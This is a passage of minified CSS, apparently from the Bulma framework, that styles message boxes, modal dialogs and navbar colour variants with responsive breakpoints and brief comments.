#dbdbdb;margin:.75em;padding-left:.75em}.menu-label{color:#7a7a7a;font-size:.75em;letter-spacing:.1em;text-transform:uppercase}.menu-label:not(:first-child){margin-top:1em}.menu-label:not(:last-child){margin-bottom:1em}/* Message: colored notification box; each is-* modifier themes header and body */.message{background-color:#f5f5f5;border-radius:4px;font-size:1rem}.message strong{color:currentColor}.message a:not(.button):not(.tag):not(.dropdown-item){color:currentColor;text-decoration:underline}.message.is-small{font-size:.75rem}.message.is-medium{font-size:1.25rem}.message.is-large{font-size:1.5rem}.message.is-white{background-color:#fff}.message.is-white .message-header{background-color:#fff;color:#0a0a0a}.message.is-white .message-body{border-color:#fff}.message.is-black{background-color:#fafafa}.message.is-black .message-header{background-color:#0a0a0a;color:#fff}.message.is-black .message-body{border-color:#0a0a0a}.message.is-light{background-color:#fafafa}.message.is-light .message-header{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.message.is-light .message-body{border-color:#f5f5f5}.message.is-dark{background-color:#fafafa}.message.is-dark .message-header{background-color:#363636;color:#fff}.message.is-dark .message-body{border-color:#363636}.message.is-primary{background-color:#ebfffc}.message.is-primary .message-header{background-color:#00d1b2;color:#fff}.message.is-primary .message-body{border-color:#00d1b2;color:#00947e}.message.is-link{background-color:#eef3fc}.message.is-link .message-header{background-color:#3273dc;color:#fff}.message.is-link .message-body{border-color:#3273dc;color:#2160c4}.message.is-info{background-color:#eef6fc}.message.is-info .message-header{background-color:#3298dc;color:#fff}.message.is-info .message-body{border-color:#3298dc;color:#1d72aa}.message.is-success{background-color:#effaf3}.message.is-success .message-header{background-color:#48c774;color:#fff}.message.is-success .message-body{border-color:#48c774;color:#257942}.message.is-warning{background-color:#fffbeb}.message.is-warning 
.message-header{background-color:#ffdd57;color:rgba(0,0,0,.7)}.message.is-warning .message-body{border-color:#ffdd57;color:#947600}.message.is-danger{background-color:#feecf0}.message.is-danger .message-header{background-color:#f14668;color:#fff}.message.is-danger .message-body{border-color:#f14668;color:#cc0f35}.message-header{align-items:center;background-color:#4a4a4a;border-radius:4px 4px 0 0;color:#fff;display:flex;font-weight:700;justify-content:space-between;line-height:1.25;padding:.75em 1em;position:relative}.message-header .delete{flex-grow:0;flex-shrink:0;margin-left:.75em}.message-header+.message-body{border-width:0;border-top-left-radius:0;border-top-right-radius:0}.message-body{border-color:#dbdbdb;border-radius:4px;border-style:solid;border-width:0 0 0 4px;color:#4a4a4a;padding:1.25em 1.5em}.message-body code,.message-body pre{background-color:#fff}.message-body pre code{background-color:transparent}/* Modal: hidden by default, shown via .is-active; card variant has head/body/foot */.modal{align-items:center;display:none;flex-direction:column;justify-content:center;overflow:hidden;position:fixed;z-index:40}.modal.is-active{display:flex}.modal-background{background-color:rgba(10,10,10,.86)}.modal-card,.modal-content{margin:0 20px;max-height:calc(100vh - 160px);overflow:auto;position:relative;width:100%}@media screen and (min-width:769px),print{.modal-card,.modal-content{margin:0 auto;max-height:calc(100vh - 40px);width:640px}}.modal-close{background:0 0;height:40px;position:fixed;right:20px;top:20px;width:40px}.modal-card{display:flex;flex-direction:column;max-height:calc(100vh - 40px);overflow:hidden;-ms-overflow-y:visible}.modal-card-foot,.modal-card-head{align-items:center;background-color:#f5f5f5;display:flex;flex-shrink:0;justify-content:flex-start;padding:20px;position:relative}.modal-card-head{border-bottom:1px solid 
#dbdbdb;border-top-left-radius:6px;border-top-right-radius:6px}.modal-card-title{color:#363636;flex-grow:1;flex-shrink:0;font-size:1.5rem;line-height:1}.modal-card-foot{border-bottom-left-radius:6px;border-bottom-right-radius:6px;border-top:1px solid #dbdbdb}.modal-card-foot .button:not(:last-child){margin-right:.5em}.modal-card-body{-webkit-overflow-scrolling:touch;background-color:#fff;flex-grow:1;flex-shrink:1;overflow:auto;padding:20px}/* Navbar: base plus per-color modifiers; desktop-only rules live in the 1024px media query */.navbar{background-color:#fff;min-height:3.25rem;position:relative;z-index:30}.navbar.is-white{background-color:#fff;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link,.navbar.is-white .navbar-brand>.navbar-item{color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link.is-active,.navbar.is-white .navbar-brand .navbar-link:focus,.navbar.is-white .navbar-brand .navbar-link:hover,.navbar.is-white .navbar-brand>a.navbar-item.is-active,.navbar.is-white .navbar-brand>a.navbar-item:focus,.navbar.is-white .navbar-brand>a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-brand .navbar-link::after{border-color:#0a0a0a}.navbar.is-white .navbar-burger{color:#0a0a0a}@media screen and (min-width:1024px){.navbar.is-white .navbar-end .navbar-link,.navbar.is-white .navbar-end>.navbar-item,.navbar.is-white .navbar-start .navbar-link,.navbar.is-white .navbar-start>.navbar-item{color:#0a0a0a}.navbar.is-white .navbar-end .navbar-link.is-active,.navbar.is-white .navbar-end .navbar-link:focus,.navbar.is-white .navbar-end .navbar-link:hover,.navbar.is-white .navbar-end>a.navbar-item.is-active,.navbar.is-white .navbar-end>a.navbar-item:focus,.navbar.is-white .navbar-end>a.navbar-item:hover,.navbar.is-white .navbar-start .navbar-link.is-active,.navbar.is-white .navbar-start .navbar-link:focus,.navbar.is-white .navbar-start .navbar-link:hover,.navbar.is-white .navbar-start>a.navbar-item.is-active,.navbar.is-white .navbar-start>a.navbar-item:focus,.navbar.is-white 
.navbar-start>a.navbar-item:hover{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-end .navbar-link::after,.navbar.is-white .navbar-start .navbar-link::after{border-color:#0a0a0a}.navbar.is-white .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-white .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-white .navbar-item.has-dropdown:hover .navbar-link{background-color:#f2f2f2;color:#0a0a0a}.navbar.is-white .navbar-dropdown a.navbar-item.is-active{background-color:#fff;color:#0a0a0a}}/* is-black navbar variant (same structure as is-white; rule runs past this chunk) */.navbar.is-black{background-color:#0a0a0a;color:#fff}.navbar.is-black .navbar-brand .navbar-link,.navbar.is-black .navbar-brand>.navbar-item{color:#fff}.navbar.is-black .navbar-brand .navbar-link.is-active,.navbar.is-black .navbar-brand .navbar-link:focus,.navbar.is-black .navbar-brand .navbar-link:hover,.navbar.is-black .navbar-brand>a.navbar-item.is-active,.navbar.is-black .navbar-brand>a.navbar-item:focus,.navbar.is-black .navbar-brand>a.navbar-item:hover{background-color:#000;color:#fff}.navbar.is-black .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-black .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-black .navbar-end .navbar-link,.navbar.is-black .navbar-end>.navbar-item,.navbar.is-black .navbar-start .navbar-link,.navbar.is-black .navbar-start>.navbar-item{color:#fff}.navbar.is-black .navbar-end .navbar-link.is-active,.navbar.is-black .navbar-end .navbar-link:focus,.navbar.is-black .navbar-end .navbar-link:hover,.navbar.is-black .navbar-end>a.navbar-item.is-active,.navbar.is-black .navbar-end>a.navbar-item:focus,.navbar.is-black .navbar-end>a.navbar-item:hover,.navbar.is-black .navbar-start .navbar-link.is-active,.navbar.is-black .navbar-start .navbar-link:focus,.navbar.is-black .navbar-start .navbar-link:hover,.navbar.is-black .navbar-start>a.navbar-item.is-active,.navbar.is-black .navbar-start>a.navbar-item:focus,.navbar.is-black 
.navbar-start>a.navbar-item:hover{background-color:#000;color:#fff}.navbar.is-black .navbar-end .navbar-link::after,.navbar.is-black .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-black .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-black .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-black .navbar-item.has-dropdown:hover .navbar-link{background-color:#000;color:#fff}.navbar.is-black .navbar-dropdown a.navbar-item.is-active{background-color:#0a0a0a;color:#fff}}.navbar.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link,.navbar.is-light .navbar-brand>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link.is-active,.navbar.is-light .navbar-brand .navbar-link:focus,.navbar.is-light .navbar-brand .navbar-link:hover,.navbar.is-light .navbar-brand>a.navbar-item.is-active,.navbar.is-light .navbar-brand>a.navbar-item:focus,.navbar.is-light .navbar-brand>a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-brand .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-light .navbar-burger{color:rgba(0,0,0,.7)}@media screen and (min-width:1024px){.navbar.is-light .navbar-end .navbar-link,.navbar.is-light .navbar-end>.navbar-item,.navbar.is-light .navbar-start .navbar-link,.navbar.is-light .navbar-start>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-light .navbar-end .navbar-link.is-active,.navbar.is-light .navbar-end .navbar-link:focus,.navbar.is-light .navbar-end .navbar-link:hover,.navbar.is-light .navbar-end>a.navbar-item.is-active,.navbar.is-light .navbar-end>a.navbar-item:focus,.navbar.is-light .navbar-end>a.navbar-item:hover,.navbar.is-light .navbar-start .navbar-link.is-active,.navbar.is-light .navbar-start .navbar-link:focus,.navbar.is-light .navbar-start .navbar-link:hover,.navbar.is-light .navbar-start>a.navbar-item.is-active,.navbar.is-light .navbar-start>a.navbar-item:focus,.navbar.is-light 
.navbar-start>a.navbar-item:hover{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-end .navbar-link::after,.navbar.is-light .navbar-start .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-light .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-light .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-light .navbar-item.has-dropdown:hover .navbar-link{background-color:#e8e8e8;color:rgba(0,0,0,.7)}.navbar.is-light .navbar-dropdown a.navbar-item.is-active{background-color:#f5f5f5;color:rgba(0,0,0,.7)}}.navbar.is-dark{background-color:#363636;color:#fff}.navbar.is-dark .navbar-brand .navbar-link,.navbar.is-dark .navbar-brand>.navbar-item{color:#fff}.navbar.is-dark .navbar-brand .navbar-link.is-active,.navbar.is-dark .navbar-brand .navbar-link:focus,.navbar.is-dark .navbar-brand .navbar-link:hover,.navbar.is-dark .navbar-brand>a.navbar-item.is-active,.navbar.is-dark .navbar-brand>a.navbar-item:focus,.navbar.is-dark .navbar-brand>a.navbar-item:hover{background-color:#292929;color:#fff}.navbar.is-dark .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-dark .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-dark .navbar-end .navbar-link,.navbar.is-dark .navbar-end>.navbar-item,.navbar.is-dark .navbar-start .navbar-link,.navbar.is-dark .navbar-start>.navbar-item{color:#fff}.navbar.is-dark .navbar-end .navbar-link.is-active,.navbar.is-dark .navbar-end .navbar-link:focus,.navbar.is-dark .navbar-end .navbar-link:hover,.navbar.is-dark .navbar-end>a.navbar-item.is-active,.navbar.is-dark .navbar-end>a.navbar-item:focus,.navbar.is-dark .navbar-end>a.navbar-item:hover,.navbar.is-dark .navbar-start .navbar-link.is-active,.navbar.is-dark .navbar-start .navbar-link:focus,.navbar.is-dark .navbar-start .navbar-link:hover,.navbar.is-dark .navbar-start>a.navbar-item.is-active,.navbar.is-dark .navbar-start>a.navbar-item:focus,.navbar.is-dark 
.navbar-start>a.navbar-item:hover{background-color:#292929;color:#fff}.navbar.is-dark .navbar-end .navbar-link::after,.navbar.is-dark .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-dark .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-dark .navbar-item.has-dropdown:hover .navbar-link{background-color:#292929;color:#fff}.navbar.is-dark .navbar-dropdown a.navbar-item.is-active{background-color:#363636;color:#fff}}.navbar.is-primary{background-color:#00d1b2;color:#fff}.navbar.is-primary .navbar-brand .navbar-link,.navbar.is-primary .navbar-brand>.navbar-item{color:#fff}.navbar.is-primary .navbar-brand .navbar-link.is-active,.navbar.is-primary .navbar-brand .navbar-link:focus,.navbar.is-primary .navbar-brand .navbar-link:hover,.navbar.is-primary .navbar-brand>a.navbar-item.is-active,.navbar.is-primary .navbar-brand>a.navbar-item:focus,.navbar.is-primary .navbar-brand>a.navbar-item:hover{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-primary .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-primary .navbar-end .navbar-link,.navbar.is-primary .navbar-end>.navbar-item,.navbar.is-primary .navbar-start .navbar-link,.navbar.is-primary .navbar-start>.navbar-item{color:#fff}.navbar.is-primary .navbar-end .navbar-link.is-active,.navbar.is-primary .navbar-end .navbar-link:focus,.navbar.is-primary .navbar-end .navbar-link:hover,.navbar.is-primary .navbar-end>a.navbar-item.is-active,.navbar.is-primary .navbar-end>a.navbar-item:focus,.navbar.is-primary .navbar-end>a.navbar-item:hover,.navbar.is-primary .navbar-start .navbar-link.is-active,.navbar.is-primary .navbar-start .navbar-link:focus,.navbar.is-primary .navbar-start .navbar-link:hover,.navbar.is-primary .navbar-start>a.navbar-item.is-active,.navbar.is-primary .navbar-start>a.navbar-item:focus,.navbar.is-primary 
.navbar-start>a.navbar-item:hover{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-end .navbar-link::after,.navbar.is-primary .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-primary .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-primary .navbar-item.has-dropdown:hover .navbar-link{background-color:#00b89c;color:#fff}.navbar.is-primary .navbar-dropdown a.navbar-item.is-active{background-color:#00d1b2;color:#fff}}.navbar.is-link{background-color:#3273dc;color:#fff}.navbar.is-link .navbar-brand .navbar-link,.navbar.is-link .navbar-brand>.navbar-item{color:#fff}.navbar.is-link .navbar-brand .navbar-link.is-active,.navbar.is-link .navbar-brand .navbar-link:focus,.navbar.is-link .navbar-brand .navbar-link:hover,.navbar.is-link .navbar-brand>a.navbar-item.is-active,.navbar.is-link .navbar-brand>a.navbar-item:focus,.navbar.is-link .navbar-brand>a.navbar-item:hover{background-color:#2366d1;color:#fff}.navbar.is-link .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-link .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-link .navbar-end .navbar-link,.navbar.is-link .navbar-end>.navbar-item,.navbar.is-link .navbar-start .navbar-link,.navbar.is-link .navbar-start>.navbar-item{color:#fff}.navbar.is-link .navbar-end .navbar-link.is-active,.navbar.is-link .navbar-end .navbar-link:focus,.navbar.is-link .navbar-end .navbar-link:hover,.navbar.is-link .navbar-end>a.navbar-item.is-active,.navbar.is-link .navbar-end>a.navbar-item:focus,.navbar.is-link .navbar-end>a.navbar-item:hover,.navbar.is-link .navbar-start .navbar-link.is-active,.navbar.is-link .navbar-start .navbar-link:focus,.navbar.is-link .navbar-start .navbar-link:hover,.navbar.is-link .navbar-start>a.navbar-item.is-active,.navbar.is-link .navbar-start>a.navbar-item:focus,.navbar.is-link .navbar-start>a.navbar-item:hover{background-color:#2366d1;color:#fff}.navbar.is-link .navbar-end 
.navbar-link::after,.navbar.is-link .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-link .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-link .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-link .navbar-item.has-dropdown:hover .navbar-link{background-color:#2366d1;color:#fff}.navbar.is-link .navbar-dropdown a.navbar-item.is-active{background-color:#3273dc;color:#fff}}.navbar.is-info{background-color:#3298dc;color:#fff}.navbar.is-info .navbar-brand .navbar-link,.navbar.is-info .navbar-brand>.navbar-item{color:#fff}.navbar.is-info .navbar-brand .navbar-link.is-active,.navbar.is-info .navbar-brand .navbar-link:focus,.navbar.is-info .navbar-brand .navbar-link:hover,.navbar.is-info .navbar-brand>a.navbar-item.is-active,.navbar.is-info .navbar-brand>a.navbar-item:focus,.navbar.is-info .navbar-brand>a.navbar-item:hover{background-color:#238cd1;color:#fff}.navbar.is-info .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-info .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-info .navbar-end .navbar-link,.navbar.is-info .navbar-end>.navbar-item,.navbar.is-info .navbar-start .navbar-link,.navbar.is-info .navbar-start>.navbar-item{color:#fff}.navbar.is-info .navbar-end .navbar-link.is-active,.navbar.is-info .navbar-end .navbar-link:focus,.navbar.is-info .navbar-end .navbar-link:hover,.navbar.is-info .navbar-end>a.navbar-item.is-active,.navbar.is-info .navbar-end>a.navbar-item:focus,.navbar.is-info .navbar-end>a.navbar-item:hover,.navbar.is-info .navbar-start .navbar-link.is-active,.navbar.is-info .navbar-start .navbar-link:focus,.navbar.is-info .navbar-start .navbar-link:hover,.navbar.is-info .navbar-start>a.navbar-item.is-active,.navbar.is-info .navbar-start>a.navbar-item:focus,.navbar.is-info .navbar-start>a.navbar-item:hover{background-color:#238cd1;color:#fff}.navbar.is-info .navbar-end .navbar-link::after,.navbar.is-info .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-info 
.navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-info .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-info .navbar-item.has-dropdown:hover .navbar-link{background-color:#238cd1;color:#fff}.navbar.is-info .navbar-dropdown a.navbar-item.is-active{background-color:#3298dc;color:#fff}}.navbar.is-success{background-color:#48c774;color:#fff}.navbar.is-success .navbar-brand .navbar-link,.navbar.is-success .navbar-brand>.navbar-item{color:#fff}.navbar.is-success .navbar-brand .navbar-link.is-active,.navbar.is-success .navbar-brand .navbar-link:focus,.navbar.is-success .navbar-brand .navbar-link:hover,.navbar.is-success .navbar-brand>a.navbar-item.is-active,.navbar.is-success .navbar-brand>a.navbar-item:focus,.navbar.is-success .navbar-brand>a.navbar-item:hover{background-color:#3abb67;color:#fff}.navbar.is-success .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-success .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-success .navbar-end .navbar-link,.navbar.is-success .navbar-end>.navbar-item,.navbar.is-success .navbar-start .navbar-link,.navbar.is-success .navbar-start>.navbar-item{color:#fff}.navbar.is-success .navbar-end .navbar-link.is-active,.navbar.is-success .navbar-end .navbar-link:focus,.navbar.is-success .navbar-end .navbar-link:hover,.navbar.is-success .navbar-end>a.navbar-item.is-active,.navbar.is-success .navbar-end>a.navbar-item:focus,.navbar.is-success .navbar-end>a.navbar-item:hover,.navbar.is-success .navbar-start .navbar-link.is-active,.navbar.is-success .navbar-start .navbar-link:focus,.navbar.is-success .navbar-start .navbar-link:hover,.navbar.is-success .navbar-start>a.navbar-item.is-active,.navbar.is-success .navbar-start>a.navbar-item:focus,.navbar.is-success .navbar-start>a.navbar-item:hover{background-color:#3abb67;color:#fff}.navbar.is-success .navbar-end .navbar-link::after,.navbar.is-success .navbar-start .navbar-link::after{border-color:#fff}.navbar.is-success 
.navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-success .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-success .navbar-item.has-dropdown:hover .navbar-link{background-color:#3abb67;color:#fff}.navbar.is-success .navbar-dropdown a.navbar-item.is-active{background-color:#48c774;color:#fff}}.navbar.is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link,.navbar.is-warning .navbar-brand>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link.is-active,.navbar.is-warning .navbar-brand .navbar-link:focus,.navbar.is-warning .navbar-brand .navbar-link:hover,.navbar.is-warning .navbar-brand>a.navbar-item.is-active,.navbar.is-warning .navbar-brand>a.navbar-item:focus,.navbar.is-warning .navbar-brand>a.navbar-item:hover{background-color:#ffd83d;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-brand .navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-burger{color:rgba(0,0,0,.7)}@media screen and (min-width:1024px){.navbar.is-warning .navbar-end .navbar-link,.navbar.is-warning .navbar-end>.navbar-item,.navbar.is-warning .navbar-start .navbar-link,.navbar.is-warning .navbar-start>.navbar-item{color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-end .navbar-link.is-active,.navbar.is-warning .navbar-end .navbar-link:focus,.navbar.is-warning .navbar-end .navbar-link:hover,.navbar.is-warning .navbar-end>a.navbar-item.is-active,.navbar.is-warning .navbar-end>a.navbar-item:focus,.navbar.is-warning .navbar-end>a.navbar-item:hover,.navbar.is-warning .navbar-start .navbar-link.is-active,.navbar.is-warning .navbar-start .navbar-link:focus,.navbar.is-warning .navbar-start .navbar-link:hover,.navbar.is-warning .navbar-start>a.navbar-item.is-active,.navbar.is-warning .navbar-start>a.navbar-item:focus,.navbar.is-warning .navbar-start>a.navbar-item:hover{background-color:#ffd83d;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-end .navbar-link::after,.navbar.is-warning .navbar-start 
.navbar-link::after{border-color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-warning .navbar-item.has-dropdown:hover .navbar-link{background-color:#ffd83d;color:rgba(0,0,0,.7)}.navbar.is-warning .navbar-dropdown a.navbar-item.is-active{background-color:#ffdd57;color:rgba(0,0,0,.7)}}.navbar.is-danger{background-color:#f14668;color:#fff}.navbar.is-danger .navbar-brand .navbar-link,.navbar.is-danger .navbar-brand>.navbar-item{color:#fff}.navbar.is-danger .navbar-brand .navbar-link.is-active,.navbar.is-danger .navbar-brand .navbar-link:focus,.navbar.is-danger .navbar-brand .navbar-link:hover,.navbar.is-danger .navbar-brand>a.navbar-item.is-active,.navbar.is-danger .navbar-brand>a.navbar-item:focus,.navbar.is-danger .navbar-brand>a.navbar-item:hover{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-brand .navbar-link::after{border-color:#fff}.navbar.is-danger .navbar-burger{color:#fff}@media screen and (min-width:1024px){.navbar.is-danger .navbar-end .navbar-link,.navbar.is-danger .navbar-end>.navbar-item,.navbar.is-danger .navbar-start .navbar-link,.navbar.is-danger .navbar-start>.navbar-item{color:#fff}.navbar.is-danger .navbar-end .navbar-link.is-active,.navbar.is-danger .navbar-end .navbar-link:focus,.navbar.is-danger .navbar-end .navbar-link:hover,.navbar.is-danger .navbar-end>a.navbar-item.is-active,.navbar.is-danger .navbar-end>a.navbar-item:focus,.navbar.is-danger .navbar-end>a.navbar-item:hover,.navbar.is-danger .navbar-start .navbar-link.is-active,.navbar.is-danger .navbar-start .navbar-link:focus,.navbar.is-danger .navbar-start .navbar-link:hover,.navbar.is-danger .navbar-start>a.navbar-item.is-active,.navbar.is-danger .navbar-start>a.navbar-item:focus,.navbar.is-danger .navbar-start>a.navbar-item:hover{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-end .navbar-link::after,.navbar.is-danger .navbar-start 
.navbar-link::after{border-color:#fff}.navbar.is-danger .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:focus .navbar-link,.navbar.is-danger .navbar-item.has-dropdown:hover .navbar-link{background-color:#ef2e55;color:#fff}.navbar.is-danger .navbar-dropdown a.navbar-item.is-active{background-color:#f14668;color:#fff}}.navbar>.container{align-items:stretch;display:flex;min-height:3.25rem;width:100%}.navbar.has-shadow{box-shadow:0 2px 0 0 #f5f5f5}.navbar.is-fixed-bottom,.navbar.is-fixed-top{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom{bottom:0}.navbar.is-fixed-bottom.has-shadow{box-shadow:0 -2px 0 0 #f5f5f5}.navbar.is-fixed-top{top:0}body.has-navbar-fixed-top,html.has-navbar-fixed-top{padding-top:3.25rem}body.has-navbar-fixed-bottom,html.has-navbar-fixed-bottom{padding-bottom:3.25rem}.navbar-brand,.navbar-tabs{align-items:stretch;display:flex;flex-shrink:0;min-height:3.25rem}.navbar-brand a.navbar-item:focus,.navbar-brand a.navbar-item:hover{background-color:transparent}.navbar-tabs{-webkit-overflow-scrolling:touch;max-width:100vw;overflow-x:auto;overflow-y:hidden}.navbar-burger{color:#4a4a4a;cursor:pointer;display:block;height:3.25rem;position:relative;width:3.25rem;margin-left:auto}.navbar-burger span{background-color:currentColor;display:block;height:1px;left:calc(50% - 8px);position:absolute;transform-origin:center;transition-duration:86ms;transition-property:background-color,opacity,transform;transition-timing-function:ease-out;width:16px}.navbar-burger span:nth-child(1){top:calc(50% - 6px)}.navbar-burger span:nth-child(2){top:calc(50% - 1px)}.navbar-burger span:nth-child(3){top:calc(50% + 4px)}.navbar-burger:hover{background-color:rgba(0,0,0,.05)}.navbar-burger.is-active span:nth-child(1){transform:translateY(5px) rotate(45deg)}.navbar-burger.is-active span:nth-child(2){opacity:0}.navbar-burger.is-active span:nth-child(3){transform:translateY(-5px) 
rotate(-45deg)}.navbar-menu{display:none}.navbar-item,.navbar-link{color:#4a4a4a;display:block;line-height:1.5;padding:.5rem .75rem;position:relative}.navbar-item .icon:only-child,.navbar-link .icon:only-child{margin-left:-.25rem;margin-right:-.25rem}.navbar-link,a.navbar-item{cursor:pointer}.navbar-link.is-active,.navbar-link:focus,.navbar-link:focus-within,.navbar-link:hover,a.navbar-item.is-active,a.navbar-item:focus,a.navbar-item:focus-within,a.navbar-item:hover{background-color:#fafafa;color:#3273dc}.navbar-item{flex-grow:0;flex-shrink:0}.navbar-item img{max-height:1.75rem}.navbar-item.has-dropdown{padding:0}.navbar-item.is-expanded{flex-grow:1;flex-shrink:1}.navbar-item.is-tab{border-bottom:1px solid transparent;min-height:3.25rem;padding-bottom:calc(.5rem - 1px)}.navbar-item.is-tab:focus,.navbar-item.is-tab:hover{background-color:transparent;border-bottom-color:#3273dc}.navbar-item.is-tab.is-active{background-color:transparent;border-bottom-color:#3273dc;border-bottom-style:solid;border-bottom-width:3px;color:#3273dc;padding-bottom:calc(.5rem - 3px)}.navbar-content{flex-grow:1;flex-shrink:1}.navbar-link:not(.is-arrowless){padding-right:2.5em}.navbar-link:not(.is-arrowless)::after{border-color:#3273dc;margin-top:-.375em;right:1.125em}.navbar-dropdown{font-size:.875rem;padding-bottom:.5rem;padding-top:.5rem}.navbar-dropdown .navbar-item{padding-left:1.5rem;padding-right:1.5rem}.navbar-divider{background-color:#f5f5f5;border:none;display:none;height:2px;margin:.5rem 0}@media screen and (max-width:1023px){.navbar>.container{display:block}.navbar-brand .navbar-item,.navbar-tabs .navbar-item{align-items:center;display:flex}.navbar-link::after{display:none}.navbar-menu{background-color:#fff;box-shadow:0 8px 16px rgba(10,10,10,.1);padding:.5rem 
0}.navbar-menu.is-active{display:block}.navbar.is-fixed-bottom-touch,.navbar.is-fixed-top-touch{left:0;position:fixed;right:0;z-index:30}.navbar.is-fixed-bottom-touch{bottom:0}.navbar.is-fixed-bottom-touch.has-shadow{box-shadow:0 -2px 3px rgba(10,10,10,.1)}.navbar.is-fixed-top-touch{top:0}.navbar.is-fixed-top .navbar-menu,.navbar.is-fixed-top-touch .navbar-menu{-webkit-overflow-scrolling:touch;max-height:calc(100vh - 3.25rem);overflow:auto}body.has-navbar-fixed-top-touch,html.has-navbar-fixed-top-touch{padding-top:3.25rem}body.has-navbar-fixed-bottom-touch,html.has-navbar-fixed-bottom-touch{padding-bottom:3.25rem}}@media screen and (min-width:1024px){.navbar,.navbar-end,.navbar-menu,.navbar-start{align-items:stretch;display:flex}.navbar{min-height:3.25rem}.navbar.is-spaced{padding:1rem 2rem}.navbar.is-spaced .navbar-end,.navbar.is-spaced .navbar-start{align-items:center}.navbar.is-spaced .navbar-link,.navbar.is-spaced a.navbar-item{border-radius:4px}.navbar.is-transparent .navbar-link.is-active,.navbar.is-transparent .navbar-link:focus,.navbar.is-transparent .navbar-link:hover,.navbar.is-transparent a.navbar-item.is-active,.navbar.is-transparent a.navbar-item:focus,.navbar.is-transparent a.navbar-item:hover{background-color:transparent!important}.navbar.is-transparent .navbar-item.has-dropdown.is-active .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:focus-within .navbar-link,.navbar.is-transparent .navbar-item.has-dropdown.is-hoverable:hover .navbar-link{background-color:transparent!important}.navbar.is-transparent .navbar-dropdown a.navbar-item:focus,.navbar.is-transparent .navbar-dropdown a.navbar-item:hover{background-color:#f5f5f5;color:#0a0a0a}.navbar.is-transparent .navbar-dropdown 
a.navbar-item.is-active{background-color:#f5f5f5;color:#3273dc}.navbar-burger{display:none}.navbar-item,.navbar-link{align-items:center;display:flex}.navbar-item.has-dropdown{align-items:stretch}.navbar-item.has-dropdown-up .navbar-link::after{transform:rotate(135deg) translate(.25em,-.25em)}.navbar-item.has-dropdown-up .navbar-dropdown{border-bottom:2px solid #dbdbdb;border-radius:6px 6px 0 0;border-top:none;bottom:100%;box-shadow:0 -8px 8px rgba(10,10,10,.1);top:auto}.navbar-item.is-active .navbar-dropdown,.navbar-item.is-hoverable:focus .navbar-dropdown,.navbar-item.is-hoverable:focus-within .navbar-dropdown,.navbar-item.is-hoverable:hover .navbar-dropdown{display:block}.navbar-item.is-active .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:focus .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:focus-within .navbar-dropdown.is-boxed,.navbar-item.is-hoverable:hover .navbar-dropdown.is-boxed,.navbar.is-spaced .navbar-item.is-active .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:focus .navbar-dropdown,.navbar.is-spaced .navbar-item.is-hoverable:focus-within 